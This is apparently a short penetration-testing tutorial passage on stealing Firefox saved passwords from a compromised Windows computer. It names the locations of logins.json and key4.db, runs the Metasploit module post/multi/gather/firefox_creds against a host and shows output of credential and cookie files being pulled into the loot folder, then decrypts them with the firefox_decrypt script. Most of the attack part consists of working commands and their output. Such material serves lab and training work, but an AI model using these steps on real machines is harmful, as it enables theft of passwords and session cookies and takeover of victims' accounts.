Mozilla Firefox built-in password manager stores encrypted credentials in “logins.json”. Credentials are stored in logins.json are encrypted with a key that is stored in the “key4.db” file. Both of these files are located in a certain Windows directory.

%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

There’s an MSF module which we’ll use to dump Firefox stored passwords on a compromised computer.

Module: firefox_creds

run post/multi/gather/firefox_creds

[+] Downloaded cert9.db: /root/.msf4/loot/20200927050238_default_10.10.78.147_ff.ljfn812a.cert_254315.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20200927050241_default_10.10.78.147_ff.ljfn812a.cook_800633.bin
[+] Downloaded key4.db: /root/.msf4/loot/20200927050253_default_10.10.78.147_ff.ljfn812a.key4_784345.bin
[+] Downloaded logins.json: /root/.msf4/loot/20200927050257_default_10.10.78.147_ff.ljfn812a.logi_176246.bin

This module has downloaded 4 files for us but you can do it download them manually.

These files have been renamed to .bin just rename them to their original extension.

As you know the credentials are encrypted so now we have to decrypt it.

Decrypting Stored Passwords in Mozilla Firefox

Download firefox_decrypt to your local machine and run the script: git clone

There’s a manual on the GitHub repo you can follow. let’s decrypt our credential.

python firefox_decrypt.py /root/.msf4/loot